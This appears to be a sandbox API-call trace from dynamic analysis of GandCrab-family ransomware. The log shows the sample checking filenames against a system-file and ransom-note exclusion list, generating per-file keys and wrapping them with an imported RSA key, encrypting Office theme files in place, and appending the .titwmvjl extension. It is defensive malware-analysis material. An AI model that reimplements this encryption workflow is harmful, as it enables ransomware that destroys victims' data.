[0074.326] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457475[[fn=Frame]].thmx") returned 129 [0074.326] lstrcmpiW (lpString1="TM03457475[[fn=Frame]].thmx", lpString2="desktop.ini") returned 1 [0074.326] lstrcmpiW (lpString1="TM03457475[[fn=Frame]].thmx", lpString2="autorun.inf") returned 1 [0074.326] lstrcmpiW (lpString1="TM03457475[[fn=Frame]].thmx", lpString2="ntuser.dat") returned 1 [0074.326] lstrcmpiW (lpString1="TM03457475[[fn=Frame]].thmx", lpString2="iconcache.db") returned 1 [0074.326] lstrcmpiW (lpString1="TM03457475[[fn=Frame]].thmx", lpString2="bootsect.bak") returned 1 [0074.326] lstrcmpiW (lpString1="TM03457475[[fn=Frame]].thmx", lpString2="boot.ini") returned 1 [0074.326] lstrcmpiW (lpString1="TM03457475[[fn=Frame]].thmx", lpString2="ntuser.dat.log") returned 1 [0074.326] lstrcmpiW (lpString1="TM03457475[[fn=Frame]].thmx", lpString2="thumbs.db") returned 1 [0074.326] lstrcmpiW (lpString1="TM03457475[[fn=Frame]].thmx", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0074.326] lstrcmpiW (lpString1="TM03457475[[fn=Frame]].thmx", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0074.326] lstrcmpiW (lpString1="TM03457475[[fn=Frame]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0074.327] lstrcmpiW (lpString1="TM03457475[[fn=Frame]].thmx", lpString2="CRAB-DECRYPT.html") returned 1 [0074.327] lstrcmpiW (lpString1="TM03457475[[fn=Frame]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0074.327] lstrcmpiW (lpString1="TM03457475[[fn=Frame]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0074.327] lstrcmpiW (lpString1="TM03457475[[fn=Frame]].thmx", lpString2="ntldr") returned 1 [0074.327] lstrcmpiW (lpString1="TM03457475[[fn=Frame]].thmx", lpString2="NTDETECT.COM") returned 1 [0074.327] lstrcmpiW (lpString1="TM03457475[[fn=Frame]].thmx", lpString2="Bootfont.bin") returned 1 [0074.327] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457475[[fn=Frame]].thmx") returned 129 [0074.327] lstrlenW (lpString=".thmx") returned 5 [0074.327] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0074.327] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".thmx ") returned 6 [0074.327] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.327] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0074.327] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457475[[fn=Frame]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457475[[fn=frame]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0074.328] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.328] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0074.334] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.335] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.335] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0074.335] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0074.335] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0074.336] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0074.336] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0074.336] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.336] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0074.336] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.336] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.336] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0074.337] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0074.337] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0074.337] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0074.337] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0074.337] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.337] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0074.337] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.338] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.338] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0074.338] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.338] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5037f8) returned 1 [0074.338] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.338] CryptGetKeyParam (in: hKey=0x5037f8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0074.339] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.339] CryptEncrypt (in: hKey=0x5037f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0074.339] GetLastError () returned 0x0 [0074.339] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.339] CryptDestroyKey (hKey=0x5037f8) returned 1 [0074.339] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.339] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0074.339] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.339] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0074.340] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.340] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503278) returned 1 [0074.340] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.340] CryptGetKeyParam (in: hKey=0x503278, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0074.340] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.340] CryptEncrypt (in: hKey=0x503278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0074.341] GetLastError () returned 0x0 [0074.341] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.341] CryptDestroyKey (hKey=0x503278) returned 1 [0074.341] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.341] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0074.341] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0074.341] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0074.342] ReadFile (in: hFile=0x2ec, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259dfd0*=0x7fb28, lpOverlapped=0x0) returned 1 [0074.371] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfff804d8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.371] WriteFile (in: hFile=0x2ec, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x7fb28, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259dfb4*=0x7fb28, lpOverlapped=0x0) returned 1 [0074.382] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.382] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0074.383] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.387] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.389] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.389] CloseHandle (hObject=0x2ec) returned 1 [0074.404] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457475[[fn=Frame]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457475[[fn=frame]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457475[[fn=Frame]].thmx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457475[[fn=frame]].thmx.titwmvjl"), dwFlags=0x1) returned 1 [0074.405] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.405] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0074.405] lstrcmpW (lpString1="TM03457485[[fn=Mesh]].thmx", lpString2=".") returned 1 [0074.405] lstrcmpW (lpString1="TM03457485[[fn=Mesh]].thmx", lpString2="..") returned 1 [0074.405] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM03457485[[fn=Mesh]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457485[[fn=Mesh]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457485[[fn=Mesh]].thmx" [0074.405] lstrlenW (lpString=".titwmvjl") returned 9 [0074.405] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457485[[fn=Mesh]].thmx") returned 128 [0074.405] VirtualAlloc (lpAddress=0x0, dwSize=0x140, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0074.405] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457485[[fn=Mesh]].thmx.titwmvjl") returned 137 [0074.405] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457485[[fn=Mesh]].thmx") returned 128 [0074.405] lstrlenW (lpString=".thmx") returned 5 [0074.405] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0074.406] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".thmx ") returned 6 [0074.406] lstrcmpiW (lpString1=".thmx", lpString2=".titwmvjl") returned -1 [0074.406] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.406] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457485[[fn=Mesh]].thmx") returned 128 [0074.406] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457485[[fn=Mesh]].thmx") returned 128 [0074.406] lstrcmpiW (lpString1="TM03457485[[fn=Mesh]].thmx", lpString2="desktop.ini") returned 1 [0074.406] lstrcmpiW (lpString1="TM03457485[[fn=Mesh]].thmx", lpString2="autorun.inf") returned 1 [0074.406] lstrcmpiW (lpString1="TM03457485[[fn=Mesh]].thmx", lpString2="ntuser.dat") returned 1 [0074.406] lstrcmpiW (lpString1="TM03457485[[fn=Mesh]].thmx", lpString2="iconcache.db") returned 1 [0074.406] lstrcmpiW (lpString1="TM03457485[[fn=Mesh]].thmx", lpString2="bootsect.bak") returned 1 [0074.406] lstrcmpiW (lpString1="TM03457485[[fn=Mesh]].thmx", lpString2="boot.ini") returned 1 [0074.406] lstrcmpiW (lpString1="TM03457485[[fn=Mesh]].thmx", lpString2="ntuser.dat.log") returned 1 [0074.406] lstrcmpiW (lpString1="TM03457485[[fn=Mesh]].thmx", lpString2="thumbs.db") returned 1 [0074.406] lstrcmpiW (lpString1="TM03457485[[fn=Mesh]].thmx", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0074.406] lstrcmpiW (lpString1="TM03457485[[fn=Mesh]].thmx", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0074.406] lstrcmpiW (lpString1="TM03457485[[fn=Mesh]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0074.406] lstrcmpiW (lpString1="TM03457485[[fn=Mesh]].thmx", lpString2="CRAB-DECRYPT.html") returned 1 [0074.406] lstrcmpiW (lpString1="TM03457485[[fn=Mesh]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0074.406] lstrcmpiW (lpString1="TM03457485[[fn=Mesh]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0074.406] lstrcmpiW (lpString1="TM03457485[[fn=Mesh]].thmx", lpString2="ntldr") returned 1 [0074.406] lstrcmpiW (lpString1="TM03457485[[fn=Mesh]].thmx", lpString2="NTDETECT.COM") returned 1 [0074.406] lstrcmpiW (lpString1="TM03457485[[fn=Mesh]].thmx", lpString2="Bootfont.bin") returned 1 [0074.406] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457485[[fn=Mesh]].thmx") returned 128 [0074.406] lstrlenW (lpString=".thmx") returned 5 [0074.406] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0074.407] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".thmx ") returned 6 [0074.407] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.407] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0074.407] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457485[[fn=Mesh]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457485[[fn=mesh]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0074.407] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.407] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0074.419] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.420] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.420] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0074.420] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0074.421] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0074.421] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0074.421] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0074.421] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.421] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0074.421] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.421] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.422] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0074.422] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0074.423] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0074.423] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0074.423] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0074.423] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.423] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0074.423] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.423] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.424] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0074.424] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.424] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503738) returned 1 [0074.424] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.424] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0074.425] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.425] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0074.425] GetLastError () returned 0x0 [0074.425] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.425] CryptDestroyKey (hKey=0x503738) returned 1 [0074.425] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.425] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0074.426] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.426] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0074.426] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.426] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5033f8) returned 1 [0074.426] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.426] CryptGetKeyParam (in: hKey=0x5033f8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0074.426] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.427] CryptEncrypt (in: hKey=0x5033f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0074.427] GetLastError () returned 0x0 [0074.427] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.427] CryptDestroyKey (hKey=0x5033f8) returned 1 [0074.427] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.427] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0074.427] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0074.428] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0074.428] ReadFile (in: hFile=0x2ec, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259dfd0*=0x100000, lpOverlapped=0x0) returned 1 [0074.508] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.508] WriteFile (in: hFile=0x2ec, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259dfb4*=0x100000, lpOverlapped=0x0) returned 1 [0074.951] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.951] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0074.954] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.958] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.963] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.963] CloseHandle (hObject=0x2ec) returned 1 [0075.026] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457485[[fn=Mesh]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457485[[fn=mesh]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457485[[fn=Mesh]].thmx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457485[[fn=mesh]].thmx.titwmvjl"), dwFlags=0x1) returned 1 [0075.027] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.027] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0075.027] lstrcmpW (lpString1="TM03457491[[fn=Metropolitan]].thmx", lpString2=".") returned 1 [0075.027] lstrcmpW (lpString1="TM03457491[[fn=Metropolitan]].thmx", lpString2="..") returned 1 [0075.027] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM03457491[[fn=Metropolitan]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457491[[fn=Metropolitan]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457491[[fn=Metropolitan]].thmx" [0075.027] lstrlenW (lpString=".titwmvjl") returned 9 [0075.027] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457491[[fn=Metropolitan]].thmx") returned 136 [0075.027] VirtualAlloc (lpAddress=0x0, dwSize=0x150, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0075.028] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457491[[fn=Metropolitan]].thmx.titwmvjl") returned 145 [0075.028] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457491[[fn=Metropolitan]].thmx") returned 136 [0075.028] lstrlenW (lpString=".thmx") returned 5 [0075.028] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0075.028] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".thmx ") returned 6 [0075.028] lstrcmpiW (lpString1=".thmx", lpString2=".titwmvjl") returned -1 [0075.028] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.028] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457491[[fn=Metropolitan]].thmx") returned 136 [0075.028] lstrlenW 